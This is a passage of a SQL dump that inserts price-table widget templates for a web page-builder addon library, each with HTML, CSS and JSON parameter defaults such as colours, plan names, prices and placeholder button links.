Color","name":"icon_color","description":"","default_value":"#ffffff"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"custom_price_table\\/custom_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,300,600italic,700,800","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(49, 'Diagonal Price Table', 'diagonal_price_table_vc', 'diagonal_price_table', 'vc', '', 49, '{"html":"<div class=\\"uc_diagonal_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\">\\n        \\t<div class=\\"uc_content_box_top\\" style=\\"background:{{top_background_color}};\\">\\n              <i class=\\"uc-tel-bottom\\" style=\\"background: rgba(0, 0, 0, 0) linear-gradient(to right bottom, {{corner_background_color}} 50%, #ffffff 50%) repeat scroll 0 0;\\"><\\/i>\\n                <span>{{title}}<\\/span>\\n                <div class=\\"uc_price_marker\\">\\n                    {{currency}}{{price}}\\n                <\\/div>\\n                <em>{{month_caption}}<\\/em>\\n            <\\/div>\\n            <div class=\\"uc_price_detail\\">\\n                <ul style=\\"background-color:#ffffff;\\">\\n                    <li>{{list_content_one}}<\\/li>\\n                    <li>{{list_content_two}}<\\/li>\\n                    <li>{{list_content_three}}<\\/li>\\n                    <li>{{list_content_four}}<\\/li>\\n                    <li>{{list_content_five}}<\\/li>\\n                <\\/ul>\\n            <\\/div>\\n            <a href=\\"{{button_link}}\\" style=\\"background-color: {{button_background_color}};\\" class=\\"uc_btn\\">{{button_text}}<\\/a>\\n        <\\/div>\\n    <\\/div>","css":".uc_diagonal_price_table .uc_content_box_top:after\\n{\\n  display:none;\\n}\\n\\n.uc_diagonal_price_table .uc_content_box_top\\n{\\n  position:relative;\\n}\\n\\n.uc_diagonal_price_table .uc_content_box_top i.uc-tel-bottom\\n{\\n   \\tbottom: -30px;\\n    content: \\"\\";\\n    height: 30px;\\n    left: 0;\\n    position: absolute;\\n    width: 100%;\\n}\\n\\n\\n.uc_diagonal_price_table a.uc_btn:hover\\n{\\n\\tborder: 2px solid;\\n  \\tborder-color:{{button_hover_border}};\\n\\tbackground:none;\\n}"}', '{"options":{"enable_items":"false","path_assets":"diagonal_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"GOLD"},{"type":"uc_textfield","title":"Currency","name":"currency","description":"","default_value":"$"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"19"},{"type":"uc_textfield","title":"Month Caption","name":"month_caption","description":"","default_value":"\\/ month"},{"type":"uc_colorpicker","title":"Top Background Color","name":"top_background_color","description":"","default_value":"#039be5"},{"type":"uc_colorpicker","title":"Corner Background Color","name":"corner_background_color","description":"","default_value":"#039be5"},{"type":"uc_textfield","title":"List Content One","name":"list_content_one","description":"","default_value":"10 Websites"},{"type":"uc_textfield","title":"List Content Two","name":"list_content_two","description":"","default_value":"Unlimited bandwith"},{"type":"uc_textfield","title":"List Content Three","name":"list_content_three","description":"","default_value":"Free domain name"},{"type":"uc_textfield","title":"List Content Four","name":"list_content_four","description":"","default_value":"Free customer support"},{"type":"uc_textfield","title":"List Content Five","name":"list_content_five","description":"","default_value":"No setup fee"},{"type":"uc_colorpicker","title":"Button Background Color","name":"button_background_color","description":"","default_value":"#e5e5e5"},{"type":"uc_colorpicker","title":"Button Hover Border ","name":"button_hover_border","description":"","default_value":"#666666"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Get Started"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"https:\\/\\/www.google.com\\/"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"diagonal_price_table\\/diagonal_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Roboto:400,300,500,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(50, 'Expert Price Table', 'expert_price_table_vc', 'expert_price_table', 'vc', '', 50, '{"html":"<div class=\\"uc_expert_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\" style=\\"background-color:{{table_background_color}}\\">\\n\\t\\t\\t<h4>{{title}}<\\/h4>\\n            <div class=\\"uc_price_marker\\" style=\\"background-color:{{price_circle_color}}\\">\\n          \\t\\t<div class=\\"uc_price_marker_content\\">\\n                \\t{{price}}\\n                    <span>{{small_price}}<\\/span>\\n                    <small>{{month}}<\\/small>\\n                <\\/div>\\n            <\\/div>\\n            <div class=\\"uc_price_detail\\">\\n                <ul>\\n                    <li>{{plan_type}}<\\/li>\\n                    <li>{{storage}}<\\/li>\\n                    <li>{{type_of_plan}}<\\/li>\\n                    <li>{{security_type}}<\\/li>\\n                <\\/ul>\\n            <\\/div>\\n            <a href=\\"{{button_link}}\\" class=\\"uc_btn\\">{{button_text}}<\\/a>\\n        <\\/div>\\n    <\\/div>","html_item":"","html_item2":"","css":"","css_item":"","js":""}', '{"options":{"enable_items":"false","path_assets":"expert_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"Business"},{"type":"uc_colorpicker","title":"Table Background Color","name":"table_background_color","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Price Circle Color","name":"price_circle_color","description":"","default_value":"#3aafd6"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"$49"},{"type":"uc_textfield","title":"Small Price","name":"small_price","description":"","default_value":"99"},{"type":"uc_textfield","title":"Month","name":"month","description":"","default_value":"\\/month"},{"type":"uc_textfield","title":"Plan Type","name":"plan_type","description":"","default_value":"Unlimited"},{"type":"uc_textfield","title":"Storage ","name":"storage","description":"","default_value":"200 GB of Storage"},{"type":"uc_textfield","title":"Type Of Plan","name":"type_of_plan","description":"","default_value":"Unlimited"},{"type":"uc_textfield","title":"Security Type","name":"security_type","description":"","default_value":"Security Suite"},{"type":"uc_textfield","title":"Additional","name":"addi_tional","description":"Additional","admin_label":"true","default_value":"","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Sign Up"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"expert_price_table\\/expert_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(51, 'Full Color Price Table', 'full_color_price_table_vc', 'full_color_price_table', 'vc', '', 51, '{"html":"<div class=\\"uc_full_color_price_table\\">\\n\\t\\t<div class=\\"uc_content_box sky-blue\\" style=\\"background:{{price_table_background_color}};\\">\\n\\t\\t\\t<span>{{title}}<\\/span>\\n            <div class=\\"uc_price_marker\\">\\n          \\t\\t<sup>{{currency}}<\\/sup>{{price}}\\n            <\\/div>\\n            <em>{{month_caption}}<\\/em>\\n            <div class=\\"uc_price_detail\\">\\n                <ul>\\n                    <li>{{list_content_one}}<\\/li>\\n                    <li>{{list_content_two}}<\\/li>\\n                    <li>{{list_content_three}}<\\/li>\\n                <\\/ul>\\n            <\\/div>\\n            <a style=\\" background-color: #4ac3fd; border: 2px solid #4ac3fd;\\" href=\\"{{button_link}}\\" class=\\"uc_btn\\">{{button_text}}<\\/a>\\n        <\\/div>\\n    <\\/div>","css":".uc_full_color_price_table .uc_content_box.sky-blue\\n{\\t\\n\\tcolor:{{text_color}};\\n}\\n\\n.uc_full_color_price_table .uc_content_box.sky-blue span\\n{\\n\\tcolor:{{text_color}};\\n}\\n\\n.uc_full_color_price_table .uc_content_box.sky-blue .uc_price_marker\\n{\\n\\tcolor:{{text_color}};\\n}\\n\\n.uc_full_color_price_table .uc_content_box.sky-blue em\\n{\\n\\tcolor:{{text_color}};\\n}\\n\\n.uc_full_color_price_table .uc_content_box.sky-blue .uc_price_detail ul li\\n{\\n\\tcolor:{{text_color}};\\n}"}', '{"options":{"enable_items":"false","path_assets":"full_color_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_colorpicker","title":"Price Table Background Color","name":"price_table_background_color","description":"","default_value":"#039be5 "},{"type":"uc_colorpicker","title":"Text Color","name":"text_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"Professional"},{"type":"uc_textfield","title":"Currency","name":"currency","description":"","default_value":"$"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"19"},{"type":"uc_textfield","title":"Month Caption","name":"month_caption","description":"","default_value":"a month"},{"type":"uc_textfield","title":"List Content One","name":"list_content_one","description":"","default_value":"1 User"},{"type":"uc_textfield","title":"List Content Two","name":"list_content_two","description":"","default_value":"Unlimited Projects"},{"type":"uc_textfield","title":"List Content Three","name":"list_content_three","description":"","default_value":"1 Gb Storage"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Get Started"},{"type":"uc_colorpicker","title":"Button Border Color","name":"button_border_color","description":"","default_value":"#4ac3fd"},{"type":"uc_colorpicker","title":"Button Background Color","name":"button_background_color","description":"","default_value":"#4ac3fd"},{"type":"uc_colorpicker","title":"Button Text Hover Color","name":"button_text_hover_color","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Button Hover Border Color","name":"button_hover_border_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"full_color_price_table\\/full_color_price_table.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL);
INSERT INTO `cyb_addonlibrary_addons` (`id`, `title`, `name`, `alias`, `addontype`, `description`, `ordering`, `templates`, `config`, `catid`, `is_active`, `test_slot1`, `test_slot2`, `test_slot3`) VALUES
(52, 'Gradient Price Table', 'gradient_price_table_vc', 'gradient_price_table', 'vc', '', 52, '{"html":"<div class=\\"uc_gradient_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\" style=\\"background: rgba(0, 0, 0, 0) linear-gradient(to top, {{gradient_color_one}}, {{gradient_color_two}}) repeat scroll 0 0;\\">\\n\\t\\t\\t<h4 style=\\"color:{{title_text_color}}\\">{{title_text}}<\\/h4>\\n            <div class=\\"uc_price_marker\\">\\n          \\t\\t<sup>{{currency}}<\\/sup>{{price}}<sub>{{month_caption}}<\\/sub>\\n            <\\/div>\\n            <div class=\\"uc_price_detail\\">\\n                <ul>\\n                    <li><strong>{{list_content_bold_one}}<\\/strong> {{list_content_one}}<\\/li>\\n                    <li><strong>{{list_content_bold_two}}<\\/strong> {{list_content_two}}<\\/li>\\n                    <li><strong>{{list_content_bold_three}}<\\/strong> {{list_content_three}}<\\/li>\\n                    <li><strong>{{list_content_bold_four}}<\\/strong> {{list_content_four}}<\\/li>\\n                    <li><strong>{{list_content_bold_five}}<\\/strong> {{list_content_five}}<\\/li>\\n                <\\/ul>\\n            <\\/div>\\n            <a href=\\"{{button_link}}\\" class=\\"uc_btn\\">{{button_text}}<\\/a>\\n        <\\/div>\\n    <\\/div>","css":".uc_gradient_price_table .uc_content_box {\\n    background: rgba(0, 0, 0, 0) linear-gradient(to top, {{gradient_color_one}}, {{gradient_color_two}}) repeat scroll 0 0;\\n    color: {{content_common_color}};\\n}\\n\\n.uc_gradient_price_table .uc_price_marker sub,.uc_gradient_price_table .uc_price_marker sup \\n{\\n\\tcolor: {{small_text_color}};\\n}\\nh4{ border:0;}\\n.uc_gradient_price_table a.uc_btn{\\n\\tbackground-color:{{button_color}};\\n\\tcolor:{{button_text_color}};\\n}\\n\\n.uc_gradient_price_table a.uc_btn:hover\\n{\\n\\tbackground-color:{{button_hover_color}};\\n\\n}"}', '{"options":{"enable_items":"false","path_assets":"gradient_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_textfield","title":"Title Text","name":"title_text","description":"","default_value":"Basic"},{"type":"uc_colorpicker","title":"Title Text Color","name":"title_text_color","description":"","default_value":"#0277bd"},{"type":"uc_colorpicker","title":"Content Common Color","name":"content_common_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Currency","name":"currency","description":"","default_value":"$"},{"type":"uc_textfield","title":"Month Caption","name":"month_caption","description":"","default_value":"\\/MO"},{"type":"uc_colorpicker","title":"Small Text Color","name":"small_text_color","description":"","default_value":"#2e80a7"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"30"},{"type":"uc_textfield","title":"List Content Bold One","name":"list_content_bold_one","description":"","default_value":"256MB"},{"type":"uc_textfield","title":"List Content One","name":"list_content_one","description":"","default_value":"Memory"},{"type":"uc_textfield","title":"List Content Bold Two","name":"list_content_bold_two","description":"","default_value":"1"},{"type":"uc_textfield","title":"List Content Two","name":"list_content_two","description":"","default_value":"User"},{"type":"uc_textfield","title":"List Content Bold Three","name":"list_content_bold_three","description":"","default_value":"1"},{"type":"uc_textfield","title":"List Content Three","name":"list_content_three","description":"","default_value":"Domain"},{"type":"uc_textfield","title":"List Content Bold Four","name":"list_content_bold_four","description":"","default_value":"Unlimited"},{"type":"uc_textfield","title":"List Content Four","name":"list_content_four","description":"","default_value":"Bandwidth"},{"type":"uc_textfield","title":"List Content Bold Five","name":"list_content_bold_five","description":"","default_value":"24\\/7 "},{"type":"uc_textfield","title":"List Content Five","name":"list_content_five","description":"","default_value":"Support"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"SELECT"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"https:\\/\\/www.google.com"},{"type":"uc_colorpicker","title":"Button Text Color","name":"button_text_color","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Button Color","name":"button_color","description":"","default_value":"#112e3c"},{"type":"uc_colorpicker","title":"Gradient Color One","name":"gradient_color_one","description":"","default_value":"#3ad2d1"},{"type":"uc_colorpicker","title":"Gradient Color Two","name":"gradient_color_two","description":"","default_value":"#3aa0d1"},{"type":"uc_colorpicker","title":"Button Hover Color","name":"button_hover_color","description":"","default_value":"#0c1f28"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"gradient_price_table\\/gradient_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,300,600,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(53, 'Icon Price Table', 'icon_price_table_vc', 'icon_price_table', 'vc', '', 53, '{"html":"<div class=\\"uc_icon_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\">\\n        \\t<div class=\\"uc_price_box\\" style=\\"color: {{content_text_color}};\\">\\n            \\t<ul>\\n                    <li><div class=\\"icon-box\\" style=\\"color:{{icon_color}};\\"><i class=\\"fa {{icon}}\\"><\\/i><\\/div><\\/li>\\n                    <li><span style=\\"color:{{title_color}};\\">{{title}}<\\/span><\\/li>\\n                    <li>{{list_content_one}}<\\/li>\\n                    <li>{{list_content_two}}<\\/li>\\n                    <li>{{list_content_three}}<\\/li>\\n                    <li>{{list_content_four}}<\\/li>\\n                    <li>\\n                    \\t<h3 style=\\"color:{{price_color}};\\">{{price}}<\\/h3>\\n                    \\t<small style=\\"color:{{small_price_title_color}};\\">{{month_caption}}<\\/small>\\n                    <\\/li>\\n                    <li><a style=\\"background-color:{{button_background_color}};\\" class=\\"uc_btn\\" href=\\"{{button_link}}\\">{{button_text}}<\\/a><\\/li>\\n                <\\/ul>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>","css":".uc_icon_price_table .uc_content_box .uc_price_box ul li a.uc_btn \\n{\\n\\n\\t  color: {{button_text_color}};\\n}\\n\\n.uc_icon_price_table .uc_content_box .uc_price_box ul li a.uc_btn:hover {\\n    background: {{button_hover_color}};\\n}\\n\\n.uc_icon_price_table .uc_content_box\\n{\\n   background:#ffffff; \\n}"}', '{"options":{"enable_items":"false","path_assets":"icon_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_textfield","title":"Icon","name":"icon","description":"","default_value":"fa-cog"},{"type":"uc_colorpicker","title":"Icon Color","name":"icon_color","description":"","default_value":"#ffbb42"},{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"Good"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#ffbb42"},{"type":"uc_textfield","title":"List Content One","name":"list_content_one","description":"","default_value":"Responsive Design"},{"type":"uc_textfield","title":"List Content Two","name":"list_content_two","description":"","default_value":"Color Customization"},{"type":"uc_textfield","title":"List Content Three","name":"list_content_three","description":"","default_value":"HTML5 & CSS3"},{"type":"uc_textfield","title":"List Content Four","name":"list_content_four","description":"","default_value":"Styled elements"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"$299"},{"type":"uc_colorpicker","title":"Price Color","name":"price_color","description":"","default_value":"#ffbb42"},{"type":"uc_colorpicker","title":"Small Price Title Color","name":"small_price_title_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Month Caption","name":"month_caption","description":"","default_value":"per month"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Join Now"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"},{"type":"uc_colorpicker","title":"Button Text Color","name":"button_text_color","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Button Background Color","name":"button_background_color","description":"","default_value":"#ffbb42"},{"type":"uc_colorpicker","title":"Button Hover Color","name":"button_hover_color","description":"","default_value":"#ffc255"},{"type":"uc_colorpicker","title":"Content Text Color","name":"content_text_color","description":"","default_value":"#777777"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"icon_price_table\\/icon_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,300,700,900","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(54, 'Image Price Table', 'image_price_table_vc', 'image_price_table', 'vc', '', 54, '{"html":"<div class=\\"uc_image_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\" style=\\"color: {{content_color}};  border-color:{{price_border}};\\">\\n\\t\\t\\t<div class=\\"uc_plan_name\\" style=\\"color:{{sub_title_color}};\\">\\n\\t\\t\\t\\t<div class=\\"uc_price\\" style=\\"background: {{price_background}};\\n\\tcolor:{{price_color}};\\">{{price}}<\\/div>\\t\\n                <h3>{{title_text}}<\\/h3>\\n                <p>{{sub_title}}<\\/p>            \\t\\n            <\\/div>\\t\\t\\n            <div class=\\"uc_plan_features\\">\\n            \\t<ul>\\n                \\t<li><img src=\\"{{price_table_image}}\\" alt=\\"\\"><\\/li>\\n                    <li>\\n                    \\t{{content}}\\n                    <\\/li>\\n                <\\/ul>\\n            <\\/div>\\t\\n            <a href=\\"#\\" class=\\"uc_btn\\" style=\\"background: {{button_color}};\\">{{button_text}}<\\/a>\\n        <\\/div>\\n    <\\/div>","css":".uc_image_price_table .uc_content_box a.uc_btn:hover\\n{\\n  color:#ffffff;\\n}\\n.uc_image_price_table .uc_content_box a.uc_btn\\n{\\n \\tpadding:20px 0px!important;\\n  \\n}\\n\\n.uc_image_price_table .uc_content_box\\n{\\n\\tborder-top: 5px solid ;\\n}"}', '{"options":{"path_assets":"image_price_table","description":"","link_resource":"","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"$99"},{"type":"uc_colorpicker","title":"Price Color","name":"price_color","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Price Background","name":"price_background","description":"","default_value":"#1b253b"},{"type":"uc_colorpicker","title":"Price Border","name":"price_border","description":"","default_value":"#1b253b"},{"type":"uc_textfield","title":"Title Text","name":"title_text","description":"","default_value":"Standard"},{"type":"uc_colorpicker","title":"Content Color","name":"content_color","description":"","default_value":"#333333"},{"type":"uc_textfield","title":"Sub Title","name":"sub_title","description":"","default_value":"Monthly Plan"},{"type":"uc_colorpicker","title":"Sub Title Color","name":"sub_title_color","description":"","default_value":"#999999"},{"type":"uc_image","title":"Price Table Image","name":"price_table_image","description":"","add_thumb":"false","add_thumb_large":"true","default_value":"[url_assets]\\/01.png"},{"type":"uc_textfield","title":"Content","name":"content","description":"","default_value":"Pellentesque odio nisi, euismod in. Host multiple sites under one account, each with separate control panels. Starting at "},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Choose Plan"},{"type":"uc_colorpicker","title":"Button Color","name":"button_color","description":"","default_value":"#1b253b"},{"type":"uc_colorpicker","title":"Button Text Color","name":"button_text_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"image_price_table\\/image_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(55, 'Jumbo Price Table', 'jumbo_price_table_vc', 'jumbo_price_table', 'vc', '', 55, '{"html":"<div class=\\"uc_jumbo_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\">\\n           <div class=\\"uc_top_sec\\" style=\\"background-color:{{table_top_background_color}} ;\\">\\n           \\t\\t<div class=\\"icon-box\\" style=\\"color: {{icon_color}};\\"><i class=\\"fa {{icon}} icon\\"><\\/i><\\/div>\\n                <h2 style=\\"color:{{title_color}};\\">{{title}}<\\/h2>\\n                <span style=\\"color: {{price_color}};\\">{{price}}<\\/span>\\n            <\\/div>\\n            <div class=\\"uc_bottom_sec\\">\\n                <ul>\\n                  <li>{{list_content_one_bold}} <span>{{list_content_one}}<\\/span><\\/li>\\n                  <li>{{list_content_two_bold}} <span>{{list_content_two}}<\\/span><\\/li>\\n                  <li>{{list_content_three_bold}} <span>{{list_content_three}}<\\/span><\\/li>\\n                  <li>{{list_content_four_bold}} <span>{{list_content_four}}<\\/span><\\/li>\\n                <\\/ul>\\n                <p style=\\" background-color: {{content_background_color}};\\">{{content}} <\\/p>\\n                <a class=\\"uc_btn\\" style=\\"background-color:{{button_color}};\\" href=\\"{{button_link}}\\"> {{button_text}} <i class=\\"fa {{button_icon}}\\"><\\/i><\\/a>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>","css":".uc_jumbo_price_table .uc_content_box a.uc_btn:hover\\n{\\n\\tbackground:{{button_color_hover}};\\n}\\n\\n.uc_jumbo_price_table\\n{\\n    padding: 0px 0;\\n}"}', '{"options":{"enable_items":"false","path_assets":"jumbo_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_colorpicker","title":"Table Top Background Color","name":"table_top_background_color","description":"","default_value":"#54ccb5"},{"type":"uc_textfield","title":"Icon","name":"icon","description":"","default_value":"fa-users"},{"type":"uc_colorpicker","title":"Icon Color","name":"icon_color","description":"","default_value":"#447f71"},{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"Smallest Company"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Price ","name":"price","description":"","default_value":"$0.01\\/month"},{"type":"uc_colorpicker","title":"Price Color","name":"price_color","description":"","default_value":"#447f71"},{"type":"uc_textfield","title":"List Content One Bold","name":"list_content_one_bold","description":"","default_value":"Unlimited"},{"type":"uc_textfield","title":"List Content One","name":"list_content_one","description":"","default_value":"Awesomeness"},{"type":"uc_textfield","title":"List Content Two Bold","name":"list_content_two_bold","description":"","default_value":"Unlimited"},{"type":"uc_textfield","title":"List Content Two","name":"list_content_two","description":"","default_value":"Coolness"},{"type":"uc_textfield","title":"List Content Three Bold","name":"list_content_three_bold","description":"","default_value":"Unlimited"},{"type":"uc_textfield","title":"List Content Three","name":"list_content_three","description":"","default_value":"Cuteness"},{"type":"uc_textfield","title":"List Content Four Bold","name":"list_content_four_bold","description":"","default_value":"Unlimited"},{"type":"uc_textfield","title":"List Content Four","name":"list_content_four","description":"","default_value":"Freebies"},{"type":"uc_textfield","title":"Content ","name":"content","description":"","default_value":"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla nec pellentesque ex. Morbi metus ante, congue non suscipit a, accumsan eget odio. Mauris consectetur blandit ante convallis ornare. "},{"type":"uc_colorpicker","title":"Content Background Color","name":"content_background_color","description":"","default_value":"#f4f4f4"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":" Start Your Free Trial for 25 Years "},{"type":"uc_colorpicker","title":"Button Color","name":"button_color","description":"","default_value":"#ff8939"},{"type":"uc_colorpicker","title":"Button Color Hover","name":"button_color_hover","description":"","default_value":"#e67b33 "},{"type":"uc_colorpicker","title":"Button Text Color","name":"button_text_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Button Icon","name":"button_icon","description":"","default_value":"fa-arrow-right"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"jumbo_price_table\\/jumbo_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,300,600,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(56, 'Mega Price Table', 'mega_price_table_vc', 'mega_price_table', 'vc', '', 56, '{"html":"<div class=\\"uc_mega_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\" style=\\"background-color:{{table_background_color}};\\n\\tcolor:{{text_color}};\\">\\n\\t\\t\\t<h5>{{plan_type}}<\\/h5>\\n            <h1 style=\\"color:{{text_color}} !important;\\"><sup>{{currency}}<\\/sup>{{price}}<sub>{{month}}<\\/sub><\\/h1>\\n            <div class=\\"uc_heading\\">{{content}}<\\/div>\\n            <ul>\\n                <li>{{list_content_one}}<\\/li>\\n                <li>{{list_content_two}}<\\/li>\\n                <li>{{list_content_three}}<\\/li>\\n                <li>{{list_content_four}}<\\/li>\\n                <li>{{list_content_five}}<\\/li>\\n            <\\/ul>\\n            <a href=\\"{{button_link}}\\" style=\\"border-color: {{button_border}};\\" class=\\"uc_btn\\">{{button_text}}<\\/a>\\n        <\\/div>\\n    <\\/div>","css":".uc_mega_price_table .uc_content_box a.uc_btn {\\n    border: 2px solid;\\n  \\t\\n}\\n\\n.uc_mega_price_table .uc_content_box a.uc_btn:hover{\\n  \\tbackground-color: {{button_hover}};\\n    border: 2px solid;\\n  \\tborder-color: {{button_border}}; \\n  \\tcolor: {{button_text_color_hover}};\\n}\\n\\n.uc_mega_price_table .uc_content_box{\\n\\tbackground-image:url({{tag}});\\n}"}', '{"options":{"path_assets":"mega_price_table","description":"","link_resource":"","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_colorpicker","title":"Table Background Color","name":"table_background_color","description":"","default_value":"#212121"},{"type":"uc_colorpicker","title":"Text Color","name":"text_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Plan Type","name":"plan_type","description":"","default_value":"Standard"},{"type":"uc_textfield","title":"Currency","name":"currency","description":"","default_value":"$"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"29"},{"type":"uc_textfield","title":"Month","name":"month","description":"","default_value":"\\/MONTH"},{"type":"uc_textfield","title":"Content","name":"content","description":"","default_value":"Perfect for mid level companies."},{"type":"uc_textfield","title":"List Content One","name":"list_content_one","description":"","default_value":"12 Websites"},{"type":"uc_textfield","title":"List Content Two","name":"list_content_two","description":"","default_value":"Unlimited bandwith"},{"type":"uc_textfield","title":"List Content Three","name":"list_content_three","description":"","default_value":"Free domain name"},{"type":"uc_textfield","title":"List Content Four","name":"list_content_four","description":"","default_value":"Free customer support"},{"type":"uc_textfield","title":"List Content Five","name":"list_content_five","description":"","default_value":"No setup fee"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Get Started"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"},{"type":"uc_colorpicker","title":"Button Border","name":"button_border","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Button Hover","name":"button_hover","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Button Text Color","name":"button_text_color","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Button Text Color 